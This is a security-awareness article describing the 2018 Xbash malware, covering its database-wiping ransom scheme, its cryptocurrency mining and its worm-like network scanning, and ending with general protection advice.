Xbash

Xbash is a particularly harmful malware that has the potential to be one of the threats to make the headlines in 2018. Xbash is written in Python and has many features that tie together thus enabling Xbash to cause trouble in various, different ways. For example, this cunning threat could hijack your PC and make it part of a botnet, use your computer to mine cryptocurrency thus reducing the lifespan of the machine (mining cryptocurrency causes your system to overheat for long periods of time) greatly but perhaps worst of all is that Xbash can get access to all your databases and delete all of the information stored there permanently. What makes Xbash even more threatening is that it is capable of infecting other systems and servers if they are linked to a network that also is being used by an infected PC. This is achieved by adding a worm feature and increasing the seriousness of the threat.

Xbash operates via a Command & Control server, which feeds the malware with a continuous stream of IP addresses that need to be probed for vulnerabilities.

To determine what software type and services that are running on the targeted server, Xbash will scan a large number of ports. The authors have programmed the malware to look for specific services that are used for database management, file transfer, remote desktop access, etc. If any of the services are active, Xbash attempts to identify their versions, as well as check whether they are using the default login credentials. Xbash looks for outdated versions in particular since they are more likely to feature unpatched exploits that could allow the remote attackers to continue with their shady operation. All collected data is then transferred to the remote Command & Control server.

The current variants of the Xbash Ransomware target three database management software products – MySQL, PostgreSQL and MongoDB. However, the attack will only be completed if the compromised server is running on Linux – Windows servers seem to be safe for now. Sadly, Xbash does not make any attempt to preserve the database by either encrypting or exporting it to the attacker's server. Instead, it wipes it out entirely and then replaces it with a new database titled 'PLEASE_READ_ME_XYZ.' The newly created database contains a single table called 'WARNING,' and inside it is the ransom message:

'Send 0.02 BTC to this address and contact this email with your website or your IP or db_name of your server to recover your database! Your DB is Backed up to our servers!If we not received your payment,we will leak your database

backupsql@pm.me'

The creators of Xbash have already accumulated approximately $6400 from 48 victims in the three Bitcoin wallets that they have. None of the people who have fallen into this trap and paid up will be able to recover their data. This is why it is never safe to pay when being extorted by cybercriminals. There is absolutely no guarantee that you will receive what you are being told you will and even if, by any chance, you do it, your hard earned money will go for the cybercrooks' next project.

As we already mentioned, one of the features of Xbash is cryptocurrency mining. This threat would scan your system, and if you have a coin miner running, Xbash would disable and wipe it off your system, instead replacing it with its own coin mining software. When this is done, Xbash will ensure that its coin miner will continue to run even if the server is restarted.

After analyzing the Xbash's code, researchers have identified a Python class named 'LanScan.' When an infected computer is connected to a network, the 'LanScan' feature of Xbash scans the local intranet and makes a list of all the IP addresses that are linked to it. This is why Xbash is said to behave like a worm. If this is performed successfully the creators of Xbash would have access to all the systems connected to the infiltrated network and would begin scanning them for vulnerabilities. If Xbash detects an exploitable service, it would infect the system and begin the whole process all over again.

It is not easy to protect yourself from highly malignant threats like Xbash. One thing every user must do is to keep all their software up-to-date. This may sound like a dull task, but it may save you a lot of trouble. Nowadays, there is third-party software available to help you keep track of updates for all the software you have installed on your system and therefore make it much less likely to have to deal with pests like Xbash. Another important step to take is to download a trustworthy anti-spyware suite that would keep an eye out for any unsafe software that would attempt to take advantage of you.